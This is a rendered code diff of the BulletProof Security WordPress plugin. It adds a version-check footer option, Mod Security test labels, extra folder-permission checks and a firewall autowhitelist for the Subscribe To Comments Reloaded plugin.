  $bps_topDiv = '<div id="message" class="updated" style="background-color:#dfecf2;border:1px solid #999;-moz-border-radius-topleft:3px;-webkit-border-top-left-radius:3px;-khtml-border-top-left-radius:3px;border-top-left-radius:3px;-moz-border-radius-topright:3px;-webkit-border-top-right-radius:3px;-khtml-border-top-right-radius:3px;border-top-right-radius:3px;-webkit-box-shadow: 3px 3px 5px -1px rgba(153,153,153,0.7);-moz-box-shadow: 3px 3px 5px -1px rgba(153,153,153,0.7);box-shadow: 3px 3px 5px -1px rgba(153,153,153,0.7);"><p>';
155
  $bps_bottomDiv = '</p></div>';
@@ -2102,7 +2103,7 @@ if ( isset( $_POST['Submit-maintenance-mode-off'] ) && current_user_can('manage_
2102
  </table>
2103
  </div>
2104
 
2105
- <div id="AITpro-link">BulletProof Security <?php echo BULLETPROOF_VERSION; ?> Plugin by <a href="https://www.ait-pro.com/" target="_blank" title="AITpro Website Security">AITpro Website Security</a>
2106
  </div>
2107
  </div>
2108
  </div>
150
  $bps_plugin_dir = str_replace( ABSPATH, '', WP_PLUGIN_DIR );
151
  // Replace ABSPATH = wp-content
152
  $bps_wpcontent_dir = str_replace( ABSPATH, '', WP_CONTENT_DIR );
153
+ $vcheck_options = get_option('bulletproof_security_options_vcheck');
154
  // Top div echo & bottom div echo
155
  $bps_topDiv = '<div id="message" class="updated" style="background-color:#dfecf2;border:1px solid #999;-moz-border-radius-topleft:3px;-webkit-border-top-left-radius:3px;-khtml-border-top-left-radius:3px;border-top-left-radius:3px;-moz-border-radius-topright:3px;-webkit-border-top-right-radius:3px;-khtml-border-top-right-radius:3px;border-top-right-radius:3px;-webkit-box-shadow: 3px 3px 5px -1px rgba(153,153,153,0.7);-moz-box-shadow: 3px 3px 5px -1px rgba(153,153,153,0.7);box-shadow: 3px 3px 5px -1px rgba(153,153,153,0.7);"><p>';
156
  $bps_bottomDiv = '</p></div>';
2103
  </table>
2104
  </div>
2105
 
2106
+ <div id="AITpro-link">BulletProof Security <?php echo BULLETPROOF_VERSION; echo $vcheck_options['bps_vcheck']; ?> Plugin by <a href="https://www.ait-pro.com/" target="_blank" title="AITpro Website Security">AITpro Website Security</a>
2107
  </div>
2108
  </div>
2109
  </div>
admin/mod-test/index.php CHANGED
@@ -2,7 +2,7 @@
2
  <html xmlns="http://www.w3.org/1999/xhtml">
3
  <head>
4
  <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
5
- <title>mod_rewrite, mod_authz_core, mod_authz_host &amp; mod_access_compat Module Testing</title>
6
  <meta name="robots" content="noindex, nofollow" />
7
  </head>
8
 
@@ -18,7 +18,7 @@ pre {background:#fff url(pre_bg.png) top left repeat;color:#000;display:block;fo
18
  -->
19
  </style>
20
 
21
- <h2 style="color:#fff;">Apache Modules: mod_rewrite, mod_authz_core, mod_authz_host &amp; mod_access_compat (directives: Order, Allow and Deny) testing</h2>
22
 
23
  <table class="Mod-Directive-Testing" width="100%" border="1">
24
  <thead>
@@ -153,7 +153,7 @@ pre {background:#fff url(pre_bg.png) top left repeat;color:#000;display:block;fo
153
  </tbody>
154
  </table>
155
 
156
- <h3 style="color:#fff;">Additional Testing for Web Hosts that ignore/do not allow/do not process IfModule conditions:</h3>
157
 
158
  <table class="Mod-Directive-Testing-no-ifmodule" width="100%" border="1">
159
  <thead>
@@ -279,7 +279,7 @@ Require host example.com
279
  </tbody>
280
  </table>
281
 
282
- <h3 style="color:#fff;">Apache No IfModule Condition & Directive Test Results Explanation:</h3>
283
  <p style="color:#fff;">Some Web Hosts ignore/do not allow/do not process all IfModule conditions and the test results for tests 1-6 above will NOT be accurate. Tests 7-11 check mod_access_compat, mod_rewrite, mod_authz_core and mod_authz_host directives without any IfModule conditions. The mod_access_compat directives <strong>"Order, Deny, Allow"</strong> should work on every single Web Host at this present time. The Apache transition from mod_access_compat to the new mod_authz_core and mod_authz_host Modules will probably result in various issues/problems on some Web Hosts during that transitional period. BPS checks your current loaded Modules and directive htaccess code compatiblity and creates htaccess code that works specifically on your particular server/website/host. If things change in the future with your Web Host or you move to another host or server, BPS will check that you htaccess code is correct for your particular server/website/host and display a message to run the Setup Wizard again if necessary, which will create new htaccess code that works specifically for your particular server/website/host.</p>
284
 
285
  <table class="Mod-Directive-Testing-Description" width="100%" border="1">
2
  <html xmlns="http://www.w3.org/1999/xhtml">
3
  <head>
4
  <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
5
+ <title>Apache Modules Testing: mod_rewrite, mod_authz_core, mod_authz_host, mod_security, mod_security2 &amp; mod_access_compat</title>
6
  <meta name="robots" content="noindex, nofollow" />
7
  </head>
8
 
18
  -->
19
  </style>
20
 
21
+ <h3 style="color:#fff;">Apache Modules Testing: mod_rewrite, mod_authz_core, mod_authz_host, mod_security, mod_security2 &amp; mod_access_compat (directives: Order, Allow and Deny)</h3>
22
 
23
  <table class="Mod-Directive-Testing" width="100%" border="1">
24
  <thead>
153
  </tbody>
154
  </table>
155
 
156
+ <h3 style="color:#fff;">Additional Testing for Web Hosts that ignore/do not allow/do not process IfModule conditions and Mod Security testing:</h3>
157
 
158
  <table class="Mod-Directive-Testing-no-ifmodule" width="100%" border="1">
159
  <thead>
279
  </tbody>
280
  </table>
281
 
282
+ <h3 style="color:#fff;">Apache No IfModule Condition, Directive & Mod Security Test Result Explanations:</h3>
283
  <p style="color:#fff;">Some Web Hosts ignore/do not allow/do not process all IfModule conditions and the test results for tests 1-6 above will NOT be accurate. Tests 7-11 check mod_access_compat, mod_rewrite, mod_authz_core and mod_authz_host directives without any IfModule conditions. The mod_access_compat directives <strong>"Order, Deny, Allow"</strong> should work on every single Web Host at this present time. The Apache transition from mod_access_compat to the new mod_authz_core and mod_authz_host Modules will probably result in various issues/problems on some Web Hosts during that transitional period. BPS checks your current loaded Modules and directive htaccess code compatiblity and creates htaccess code that works specifically on your particular server/website/host. If things change in the future with your Web Host or you move to another host or server, BPS will check that you htaccess code is correct for your particular server/website/host and display a message to run the Setup Wizard again if necessary, which will create new htaccess code that works specifically for your particular server/website/host.</p>
284
 
285
  <table class="Mod-Directive-Testing-Description" width="100%" border="1">
admin/mscan/mscan.php CHANGED
@@ -91,6 +91,7 @@ $bps_wpcontent_dir = str_replace( ABSPATH, '', WP_CONTENT_DIR );
91
  // Replace ABSPATH = wp-content/uploads
92
  $wp_upload_dir = wp_upload_dir();
93
  $bps_uploads_dir = str_replace( ABSPATH, '', $wp_upload_dir['basedir'] );
 
94
 
95
  function bpsPro_mscan_openbasedir_check() {
96
 
@@ -1924,7 +1925,7 @@ jQuery(document).ready(function($){
1924
  </table>
1925
  </div>
1926
 
1927
- <div id="AITpro-link">BulletProof Security Pro <?php echo BULLETPROOF_VERSION; ?> Plugin by <a href="https://forum.ait-pro.com/" target="_blank" title="AITpro Website Security">AITpro Website Security</a>
1928
  </div>
1929
  </div>
1930
  </div>
91
  // Replace ABSPATH = wp-content/uploads
92
  $wp_upload_dir = wp_upload_dir();
93
  $bps_uploads_dir = str_replace( ABSPATH, '', $wp_upload_dir['basedir'] );
94
+ $vcheck_options = get_option('bulletproof_security_options_vcheck');
95
 
96
  function bpsPro_mscan_openbasedir_check() {
97
 
1925
  </table>
1926
  </div>
1927
 
1928
+ <div id="AITpro-link">BulletProof Security Pro <?php echo BULLETPROOF_VERSION; echo $vcheck_options['bps_vcheck']; ?> Plugin by <a href="https://forum.ait-pro.com/" target="_blank" title="AITpro Website Security">AITpro Website Security</a>
1929
  </div>
1930
  </div>
1931
  </div>
admin/security-log/security-log.php CHANGED
@@ -72,6 +72,7 @@ $bpsSpacePop = '-------------------------------------------------------------';
72
  $bps_plugin_dir = str_replace( ABSPATH, '', WP_PLUGIN_DIR );
73
  // Replace ABSPATH = wp-content
74
  $bps_wpcontent_dir = str_replace( ABSPATH, '', WP_CONTENT_DIR );
 
75
 
76
  // Top div echo & bottom div echo
77
  $bps_topDiv = '<div id="message" class="updated" style="background-color:#dfecf2;border:1px solid #999;-moz-border-radius-topleft:3px;-webkit-border-top-left-radius:3px;-khtml-border-top-left-radius:3px;border-top-left-radius:3px;-moz-border-radius-topright:3px;-webkit-border-top-right-radius:3px;-khtml-border-top-right-radius:3px;border-top-right-radius:3px;-webkit-box-shadow: 3px 3px 5px -1px rgba(153,153,153,0.7);-moz-box-shadow: 3px 3px 5px -1px rgba(153,153,153,0.7);box-shadow: 3px 3px 5px -1px rgba(153,153,153,0.7);"><p>';
@@ -810,7 +811,7 @@ jQuery(document).ready(function($){
810
  </table>
811
  </div>
812
 
813
- <div id="AITpro-link">BulletProof Security <?php echo BULLETPROOF_VERSION; ?> Plugin by <a href="https://www.ait-pro.com/" target="_blank" title="AITpro Website Security">AITpro Website Security</a>
814
  </div>
815
  </div>
816
  </div>
72
  $bps_plugin_dir = str_replace( ABSPATH, '', WP_PLUGIN_DIR );
73
  // Replace ABSPATH = wp-content
74
  $bps_wpcontent_dir = str_replace( ABSPATH, '', WP_CONTENT_DIR );
75
+ $vcheck_options = get_option('bulletproof_security_options_vcheck');
76
 
77
  // Top div echo & bottom div echo
78
  $bps_topDiv = '<div id="message" class="updated" style="background-color:#dfecf2;border:1px solid #999;-moz-border-radius-topleft:3px;-webkit-border-top-left-radius:3px;-khtml-border-top-left-radius:3px;border-top-left-radius:3px;-moz-border-radius-topright:3px;-webkit-border-top-right-radius:3px;-khtml-border-top-right-radius:3px;border-top-right-radius:3px;-webkit-box-shadow: 3px 3px 5px -1px rgba(153,153,153,0.7);-moz-box-shadow: 3px 3px 5px -1px rgba(153,153,153,0.7);box-shadow: 3px 3px 5px -1px rgba(153,153,153,0.7);"><p>';
811
  </table>
812
  </div>
813
 
814
+ <div id="AITpro-link">BulletProof Security <?php echo BULLETPROOF_VERSION; echo $vcheck_options['bps_vcheck']; ?> Plugin by <a href="https://www.ait-pro.com/" target="_blank" title="AITpro Website Security">AITpro Website Security</a>
815
  </div>
816
  </div>
817
  </div>
admin/system-info/system-info.php CHANGED
@@ -75,6 +75,7 @@ $bps_wpcontent_dir = str_replace( ABSPATH, '', WP_CONTENT_DIR );
75
  // Replace ABSPATH = wp-content/uploads
76
  $wp_upload_dir = wp_upload_dir();
77
  $bps_uploads_dir = str_replace( ABSPATH, '', $wp_upload_dir['basedir'] );
 
78
  $bps_topDiv = '<div id="message" class="updated" style="background-color:#dfecf2;border:1px solid #999;-moz-border-radius-topleft:3px;-webkit-border-top-left-radius:3px;-khtml-border-top-left-radius:3px;border-top-left-radius:3px;-moz-border-radius-topright:3px;-webkit-border-top-right-radius:3px;-khtml-border-top-right-radius:3px;border-top-right-radius:3px;-webkit-box-shadow: 3px 3px 5px -1px rgba(153,153,153,0.7);-moz-box-shadow: 3px 3px 5px -1px rgba(153,153,153,0.7);box-shadow: 3px 3px 5px -1px rgba(153,153,153,0.7);"><p>';
79
  $bps_bottomDiv = '</p></div>';
80
 
@@ -753,8 +754,7 @@ function bpsPro_count_network_activated_plugins($count) {
753
 
754
  if ( function_exists('gc_enabled') && function_exists('gc_collect_cycles') ) {
755
  if ( gc_enabled() ) {
756
- $garbage = '<strong><span class="sysinfo-label-text">'.__('On | Cycles: ', 'bulletproof-security') . '</span></strong>' . gc_collect_cycles();
757
-
758
  } else {
759
  $garbage = 'Off';
760
  }
@@ -948,6 +948,12 @@ function bpsPro_count_network_activated_plugins($count) {
948
  bps_check_perms("../$bps_wpcontent_dir/bps-backup", "705");
949
  bps_check_perms("../$bps_wpcontent_dir/bps-backup/logs", "705");
950
  bps_check_perms("../$bps_wpcontent_dir/bps-backup/master-backups", "705");
 
 
 
 
 
 
951
  if ( $DBBoptions['bps_db_backup_folder'] != '' ) {
952
  bps_check_perms( str_replace( $wpcontent_single_slash, "../$bps_wpcontent_dir", $db_backup ), "705");
953
  }
@@ -981,6 +987,15 @@ function bpsPro_count_network_activated_plugins($count) {
981
  bps_check_perms("../$bps_wpcontent_dir/bps-backup", "755");
982
  bps_check_perms("../$bps_wpcontent_dir/bps-backup/logs", "755");
983
  bps_check_perms("../$bps_wpcontent_dir/bps-backup/master-backups", "755");
 
 
 
 
 
 
 
 
 
984
  if ( $DBBoptions['bps_db_backup_folder'] != '' ) {
985
  bps_check_perms( str_replace( $wpcontent_single_slash, "../$bps_wpcontent_dir", $db_backup ), "755");
986
  }
@@ -1162,7 +1177,7 @@ global $bps_topDiv, $bps_bottomDiv;
1162
  </table>
1163
  </div>
1164
 
1165
- <div id="AITpro-link">BulletProof Security <?php echo BULLETPROOF_VERSION; ?> Plugin by <a href="https://www.ait-pro.com/" target="_blank" title="AITpro Website Security">AITpro Website Security</a>
1166
  </div>
1167
  </div>
1168
  </div>
75
  // Replace ABSPATH = wp-content/uploads
76
  $wp_upload_dir = wp_upload_dir();
77
  $bps_uploads_dir = str_replace( ABSPATH, '', $wp_upload_dir['basedir'] );
78
+ $vcheck_options = get_option('bulletproof_security_options_vcheck');
79
  $bps_topDiv = '<div id="message" class="updated" style="background-color:#dfecf2;border:1px solid #999;-moz-border-radius-topleft:3px;-webkit-border-top-left-radius:3px;-khtml-border-top-left-radius:3px;border-top-left-radius:3px;-moz-border-radius-topright:3px;-webkit-border-top-right-radius:3px;-khtml-border-top-right-radius:3px;border-top-right-radius:3px;-webkit-box-shadow: 3px 3px 5px -1px rgba(153,153,153,0.7);-moz-box-shadow: 3px 3px 5px -1px rgba(153,153,153,0.7);box-shadow: 3px 3px 5px -1px rgba(153,153,153,0.7);"><p>';
80
  $bps_bottomDiv = '</p></div>';
81
 
754
 
755
  if ( function_exists('gc_enabled') && function_exists('gc_collect_cycles') ) {
756
  if ( gc_enabled() ) {
757
+ $garbage = '<span class="sysinfo-label-text">'.__('On', 'bulletproof-security').'<strong> | '.__('Cycles: ', 'bulletproof-security') . '</span></strong>' . gc_collect_cycles();
 
758
  } else {
759
  $garbage = 'Off';
760
  }
948
  bps_check_perms("../$bps_wpcontent_dir/bps-backup", "705");
949
  bps_check_perms("../$bps_wpcontent_dir/bps-backup/logs", "705");
950
  bps_check_perms("../$bps_wpcontent_dir/bps-backup/master-backups", "705");
951
+ bps_check_perms("../$bps_wpcontent_dir/bps-backup/mscan", "705");
952
+ bps_check_perms("../$bps_wpcontent_dir/bps-backup/wp-hashes", "705");
953
+
954
+ if ( function_exists('sys_get_temp_dir') && is_dir( $sys_get_temp_dir ) ) {
955
+ bps_check_perms("$sys_get_temp_dir", "755");
956
+ }
957
  if ( $DBBoptions['bps_db_backup_folder'] != '' ) {
958
  bps_check_perms( str_replace( $wpcontent_single_slash, "../$bps_wpcontent_dir", $db_backup ), "705");
959
  }
987
  bps_check_perms("../$bps_wpcontent_dir/bps-backup", "755");
988
  bps_check_perms("../$bps_wpcontent_dir/bps-backup/logs", "755");
989
  bps_check_perms("../$bps_wpcontent_dir/bps-backup/master-backups", "755");
990
+ bps_check_perms("../$bps_wpcontent_dir/bps-backup/mscan", "755");
991
+ bps_check_perms("../$bps_wpcontent_dir/bps-backup/wp-hashes", "755");
992
+
993
+ if ( is_dir( $upload_tmp_dir ) ) {
994
+ bps_check_perms("$upload_tmp_dir", "755");
995
+ }
996
+ if ( function_exists('sys_get_temp_dir') && is_dir( $sys_get_temp_dir ) ) {
997
+ bps_check_perms("$sys_get_temp_dir", "755");
998
+ }
999
  if ( $DBBoptions['bps_db_backup_folder'] != '' ) {
1000
  bps_check_perms( str_replace( $wpcontent_single_slash, "../$bps_wpcontent_dir", $db_backup ), "755");
1001
  }
1177
  </table>
1178
  </div>
1179
 
1180
+ <div id="AITpro-link">BulletProof Security <?php echo BULLETPROOF_VERSION; echo $vcheck_options['bps_vcheck']; ?> Plugin by <a href="https://www.ait-pro.com/" target="_blank" title="AITpro Website Security">AITpro Website Security</a>
1181
  </div>
1182
  </div>
1183
  </div>
admin/theme-skin/theme-skin.php CHANGED
@@ -77,6 +77,7 @@ $bpsSpacePop = '-------------------------------------------------------------';
77
  $bps_plugin_dir = str_replace( ABSPATH, '', WP_PLUGIN_DIR );
78
  // Replace ABSPATH = wp-content
79
  $bps_wpcontent_dir = str_replace( ABSPATH, '', WP_CONTENT_DIR );
 
80
  // Top div echo & bottom div echo
81
  $bps_topDiv = '<div id="message" class="updated" style="background-color:#dfecf2;border:1px solid #999;-moz-border-radius-topleft:3px;-webkit-border-top-left-radius:3px;-khtml-border-top-left-radius:3px;border-top-left-radius:3px;-moz-border-radius-topright:3px;-webkit-border-top-right-radius:3px;-khtml-border-top-right-radius:3px;border-top-right-radius:3px;-webkit-box-shadow: 3px 3px 5px -1px rgba(153,153,153,0.7);-moz-box-shadow: 3px 3px 5px -1px rgba(153,153,153,0.7);box-shadow: 3px 3px 5px -1px rgba(153,153,153,0.7);"><p>';
82
  $bps_bottomDiv = '</p></div>';
@@ -225,7 +226,7 @@ $bps_bottomDiv = '</p></div>';
225
  </table>
226
  </div>
227
 
228
- <div id="AITpro-link">BulletProof Security <?php echo BULLETPROOF_VERSION; ?> Plugin by <a href="https://forum.ait-pro.com/" target="_blank" title="AITpro Website Security">AITpro Website Security</a>
229
  </div>
230
  </div>
231
  </div>
77
  $bps_plugin_dir = str_replace( ABSPATH, '', WP_PLUGIN_DIR );
78
  // Replace ABSPATH = wp-content
79
  $bps_wpcontent_dir = str_replace( ABSPATH, '', WP_CONTENT_DIR );
80
+ $vcheck_options = get_option('bulletproof_security_options_vcheck');
81
  // Top div echo & bottom div echo
82
  $bps_topDiv = '<div id="message" class="updated" style="background-color:#dfecf2;border:1px solid #999;-moz-border-radius-topleft:3px;-webkit-border-top-left-radius:3px;-khtml-border-top-left-radius:3px;border-top-left-radius:3px;-moz-border-radius-topright:3px;-webkit-border-top-right-radius:3px;-khtml-border-top-right-radius:3px;border-top-right-radius:3px;-webkit-box-shadow: 3px 3px 5px -1px rgba(153,153,153,0.7);-moz-box-shadow: 3px 3px 5px -1px rgba(153,153,153,0.7);box-shadow: 3px 3px 5px -1px rgba(153,153,153,0.7);"><p>';
83
  $bps_bottomDiv = '</p></div>';
226
  </table>
227
  </div>
228
 
229
+ <div id="AITpro-link">BulletProof Security <?php echo BULLETPROOF_VERSION; echo $vcheck_options['bps_vcheck']; ?> Plugin by <a href="https://forum.ait-pro.com/" target="_blank" title="AITpro Website Security">AITpro Website Security</a>
230
  </div>
231
  </div>
232
  </div>
admin/wizard/pwizard-autofix.php CHANGED
@@ -1316,8 +1316,24 @@ RewriteRule ^(.*)$ - [F]
1316
  $r20 = array();
1317
  }
1318
 
1319
- $pattern_array = array_merge($p1, $p2, $p3, $p4, $p5, $p6, $p7, $p8, $p9, $p10, $p11, $p12, $p13, $p14, $p15, $p16, $p17, $p18, $p19, $p20);
1320
- $replace_array = array_merge($r1, $r2, $r3, $r4, $r5, $r6, $r7, $r8, $r9, $r10, $r11, $r12, $r13, $r14, $r15, $r16, $r17, $r18, $r19, $r20);
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1321
 
1322
  if ( $CC_Options_root['bps_customcode_bpsqse'] != '' ) {
1323
  $bps_customcode_bpsqse_replace = preg_replace($pattern_array, $replace_array, $bps_customcode_bpsqse_array);
@@ -1371,7 +1387,7 @@ RewriteRule ^(.*)$ - [F]
1371
  update_option('bulletproof_security_options_customcode', $Root_CC_Options);
1372
  }
1373
 
1374
- $success_array = array($woo_PagSeguro_fix, $event_espresso_fix, $woo_serial_key_fix, $woo_worldpay_fix, $kama_click_counter_fix, $riva_slider_pro_fix, $wp_auto_spinner_fix, $AgriTurismo_theme_fix, $wccp_pro_fix, $panopress_fix, $essb_code_canyon_fix, $mainwp_fix, $clevercourse_theme_fix, $wp_estore_fix, $wp_emember_fix, $easy_digital_downloads_fix, $mailpoet_fix, $mailchimp_fix, $DAPLiveLinks_fix, $wp_newsletter_fix);
1375
 
1376
  foreach ( $success_array as $successMessage ) {
1377
 
1316
  $r20 = array();
1317
  }
1318
 
1319
+ ## Subscribe To Comments Reloaded Plugin: whitelist rules
1320
+ $sctocr = 'subscribe-to-comments-reloaded/subscribe-to-comments-reloaded.php';
1321
+ $sctocr_active = in_array( $sctocr, apply_filters('active_plugins', get_option('active_plugins')));
1322
+ $sctocr_fix = '';
1323
+
1324
+ if ( $sctocr_active == 1 || is_plugin_active_for_network( $sctocr ) ) {
1325
+ $sctocr_fix = __('Subscribe To Comments Reloaded Plugin BPSQSE AutoWhitelist successful', 'bulletproof-security');
1326
+
1327
+ $p21 = array('/RewriteCond\s%\{QUERY_STRING}\s\[a-zA-Z0-9_\]=\(http\|https\):\/\/\s\[NC,OR\]/', '/RewriteCond\s%\{QUERY_STRING\}\s\[a-zA-Z0-9_\]=\/\(\[a-z0-9_\.\]\/\/\?\)\+\s\[NC,OR\]/', '/RewriteCond\s%\{QUERY_STRING\}\s\(http\|https\)\\\:\s\[NC,OR\]/');
1328
+ $r21 = array("# BPS AutoWhitelist QS2: Subscribe To Comments Reloaded Plugin", "# BPS AutoWhitelist QS3: Subscribe To Comments Reloaded Plugin", "# BPS AutoWhitelist QS4: Subscribe To Comments Reloaded Plugin");
1329
+
1330
+ } else {
1331
+ $p21 = array();
1332
+ $r21 = array();
1333
+ }
1334
+
1335
+ $pattern_array = array_merge($p1, $p2, $p3, $p4, $p5, $p6, $p7, $p8, $p9, $p10, $p11, $p12, $p13, $p14, $p15, $p16, $p17, $p18, $p19, $p20, $p21);
1336
+ $replace_array = array_merge($r1, $r2, $r3, $r4, $r5, $r6, $r7, $r8, $r9, $r10, $r11, $r12, $r13, $r14, $r15, $r16, $r17, $r18, $r19, $r20, $r21);
1337
 
1338
  if ( $CC_Options_root['bps_customcode_bpsqse'] != '' ) {
1339
  $bps_customcode_bpsqse_replace = preg_replace($pattern_array, $replace_array, $bps_customcode_bpsqse_array);
1387
  update_option('bulletproof_security_options_customcode', $Root_CC_Options);
1388
  }
1389
 
1390
+ $success_array = array($woo_PagSeguro_fix, $event_espresso_fix, $woo_serial_key_fix, $woo_worldpay_fix, $kama_click_counter_fix, $riva_slider_pro_fix, $wp_auto_spinner_fix, $AgriTurismo_theme_fix, $wccp_pro_fix, $panopress_fix, $essb_code_canyon_fix, $mainwp_fix, $clevercourse_theme_fix, $wp_estore_fix, $wp_emember_fix, $easy_digital_downloads_fix, $mailpoet_fix, $mailchimp_fix, $DAPLiveLinks_fix, $wp_newsletter_fix, $sctocr_fix);
1391
 
1392
  foreach ( $success_array as $successMessage ) {
1393
 
admin/wizard/wizard.php CHANGED
@@ -109,6 +109,7 @@ require_once( ABSPATH . 'wp-admin/includes/plugin-install.php' );
109
 
110
  $bps_wpcontent_dir = str_replace( ABSPATH, '', WP_CONTENT_DIR );
111
  $bpsSpacePop = '-------------------------------------------------------------';
 
112
 
113
  if ( isset( $_POST['Submit-Setup-Wizard'] ) ) {
114
  require_once( WP_PLUGIN_DIR . '/bulletproof-security/admin/wizard/wizard-functions.php' );
@@ -362,7 +363,15 @@ $failMessage = __('Error: Unable to create DB Table ', 'bulletproof-security');
362
  $failTextEnd = '</strong></font><br>';
363
  $HFiles_options = get_option('bulletproof_security_options_htaccess_files');
364
 
365
- // 2.5: BPS plugin 30 day review/rating request Dismiss Notice
 
 
 
 
 
 
 
 
366
  $bps_rate_options = 'bulletproof_security_options_rate_free';
367
  $gmt_offset = get_option( 'gmt_offset' ) * 3600;
368
  $bps_free_rate_review = mktime(0, 0, 0, date("m")+1, date("d")+1, date("Y"));
@@ -855,6 +864,7 @@ $HFiles_options = get_option('bulletproof_security_options_htaccess_files');
855
  'bps_jtc_register_form' => '',
856
  'bps_jtc_lostpassword_form' => '',
857
  'bps_jtc_comment_form' => '',
 
858
  'bps_jtc_buddypress_register_form' => '',
859
  'bps_jtc_buddypress_sidebar_form' => '',
860
  'bps_jtc_administrator' => '',
@@ -888,6 +898,7 @@ $HFiles_options = get_option('bulletproof_security_options_htaccess_files');
888
  'bps_jtc_register_form' => '',
889
  'bps_jtc_lostpassword_form' => '',
890
  'bps_jtc_comment_form' => '',
 
891
  'bps_jtc_buddypress_register_form' => '',
892
  'bps_jtc_buddypress_sidebar_form' => '',
893
  'bps_jtc_administrator' => '',
@@ -1350,6 +1361,7 @@ if ( isset( $_POST['Submit-Net-JTC'] ) && current_user_can('manage_options') ) {
1350
  'bps_jtc_register_form' => '',
1351
  'bps_jtc_lostpassword_form' => '',
1352
  'bps_jtc_comment_form' => '',
 
1353
  'bps_jtc_buddypress_register_form' => '',
1354
  'bps_jtc_buddypress_sidebar_form' => '',
1355
  'bps_jtc_administrator' => '',
@@ -1386,6 +1398,7 @@ if ( isset( $_POST['Submit-Net-JTC'] ) && current_user_can('manage_options') ) {
1386
  'bps_jtc_register_form' => '',
1387
  'bps_jtc_lostpassword_form' => '',
1388
  'bps_jtc_comment_form' => '',
 
1389
  'bps_jtc_buddypress_register_form' => '',
1390
  'bps_jtc_buddypress_sidebar_form' => '',
1391
  'bps_jtc_administrator' => '',
@@ -1418,7 +1431,7 @@ if ( isset( $_POST['Submit-Net-JTC'] ) && current_user_can('manage_options') ) {
1418
 
1419
  </div>
1420
 
1421
- <div id="AITpro-link">BulletProof Security <?php echo BULLETPROOF_VERSION; ?> Plugin by <a href="https://forum.ait-pro.com/" target="_blank" title="AITpro Website Security">AITpro Website Security</a>
1422
  </div>
1423
  </div>
1424
  <style>
109
 
110
  $bps_wpcontent_dir = str_replace( ABSPATH, '', WP_CONTENT_DIR );
111
  $bpsSpacePop = '-------------------------------------------------------------';
112
+ $vcheck_options = get_option('bulletproof_security_options_vcheck');
113
 
114
  if ( isset( $_POST['Submit-Setup-Wizard'] ) ) {
115
  require_once( WP_PLUGIN_DIR . '/bulletproof-security/admin/wizard/wizard-functions.php' );
363
  $failTextEnd = '</strong></font><br>';
364
  $HFiles_options = get_option('bulletproof_security_options_htaccess_files');
365
 
366
+ // 3.0: VCheck
367
+ $bps_vcheck_master = WP_PLUGIN_DIR . '/bulletproof-security/admin/htaccess/bps-vcheck.php';
368
+
369
+ if ( file_exists($bps_vcheck_master) ) {
370
+ require_once ( WP_PLUGIN_DIR . '/bulletproof-security/admin/htaccess/bps-vcheck.php' );
371
+ unlink($bps_vcheck_master);
372
+ }
373
+
374
+ // 2.9: BPS plugin 30 day review/rating request Dismiss Notice
375
  $bps_rate_options = 'bulletproof_security_options_rate_free';
376
  $gmt_offset = get_option( 'gmt_offset' ) * 3600;
377
  $bps_free_rate_review = mktime(0, 0, 0, date("m")+1, date("d")+1, date("Y"));
864
  'bps_jtc_register_form' => '',
865
  'bps_jtc_lostpassword_form' => '',
866
  'bps_jtc_comment_form' => '',
867
+ 'bps_jtc_mu_register_form' => '',
868
  'bps_jtc_buddypress_register_form' => '',
869
  'bps_jtc_buddypress_sidebar_form' => '',
870
  'bps_jtc_administrator' => '',
898
  'bps_jtc_register_form' => '',
899
  'bps_jtc_lostpassword_form' => '',
900
  'bps_jtc_comment_form' => '',
901
+ 'bps_jtc_mu_register_form' => '',
902
  'bps_jtc_buddypress_register_form' => '',
903
  'bps_jtc_buddypress_sidebar_form' => '',
904
  'bps_jtc_administrator' => '',
1361
  'bps_jtc_register_form' => '',
1362
  'bps_jtc_lostpassword_form' => '',
1363
  'bps_jtc_comment_form' => '',
1364
+ 'bps_jtc_mu_register_form' => '',
1365
  'bps_jtc_buddypress_register_form' => '',
1366
  'bps_jtc_buddypress_sidebar_form' => '',
1367
  'bps_jtc_administrator' => '',
1398
  'bps_jtc_register_form' => '',
1399
  'bps_jtc_lostpassword_form' => '',
1400
  'bps_jtc_comment_form' => '',
1401
+ 'bps_jtc_mu_register_form' => '',
1402
  'bps_jtc_buddypress_register_form' => '',
1403
  'bps_jtc_buddypress_sidebar_form' => '',
1404
  'bps_jtc_administrator' => '',
1431
 
1432
  </div>
1433
 
1434
+ <div id="AITpro-link">BulletProof Security <?php echo BULLETPROOF_VERSION; echo @$vcheck_options['bps_vcheck']; ?> Plugin by <a href="https://forum.ait-pro.com/" target="_blank" title="AITpro Website Security">AITpro Website Security</a>
1435
  </div>
1436
  </div>
1437
  <style>
bulletproof-security.php CHANGED
@@ -5,7 +5,7 @@ Plugin URI: https://forum.ait-pro.com/read-me-first/
5
  Text Domain: bulletproof-security
6
  Domain Path: /languages/
7
  Description: <strong>Feature Highlights:</strong> Setup Wizard &bull; MScan Malware Scanner &bull; .htaccess Website Security Protection (Firewalls) &bull; Security Logging|HTTP Error Logging &bull; DB Backup &bull; DB Table Prefix Changer &bull; Login Security & Monitoring &bull; JTC-Lite Login Form Bot Lockout Protection &bull; Idle Session Logout (ISL) &bull; Auth Cookie Expiration (ACE) &bull; UI Theme Skin Changer &bull; System Info: Extensive System, Server and Security Status Information &bull; FrontEnd|BackEnd Maintenance Mode
8
- Version: 2.9
9
  Author: AITpro Website Security
10
  Author URI: https://forum.ait-pro.com/read-me-first/
11
  */
@@ -28,9 +28,9 @@ Author URI: https://forum.ait-pro.com/read-me-first/
28
  */
29
 
30
  // BPS variables
31
- define( 'BULLETPROOF_VERSION', '2.9' );
32
- $bps_last_version = '2.8';
33
- $bps_version = '2.9';
34
  $aitpro_bullet = '<img src="'.plugins_url('/bulletproof-security/admin/images/aitpro-bullet.png').'" style="padding:0px 3px 0px 3px;" />';
35
  // Top div & bottom div
36
  $bps_topDiv = '<div id="message" class="updated" style="background-color:#dfecf2;border:1px solid #999;-moz-border-radius-topleft:3px;-webkit-border-top-left-radius:3px;-khtml-border-top-left-radius:3px;border-top-left-radius:3px;-moz-border-radius-topright:3px;-webkit-border-top-right-radius:3px;-khtml-border-top-right-radius:3px;border-top-right-radius:3px;-webkit-box-shadow: 3px 3px 5px -1px rgba(153,153,153,0.7);-moz-box-shadow: 3px 3px 5px -1px rgba(153,153,153,0.7);box-shadow: 3px 3px 5px -1px rgba(153,153,153,0.7);"><p>';
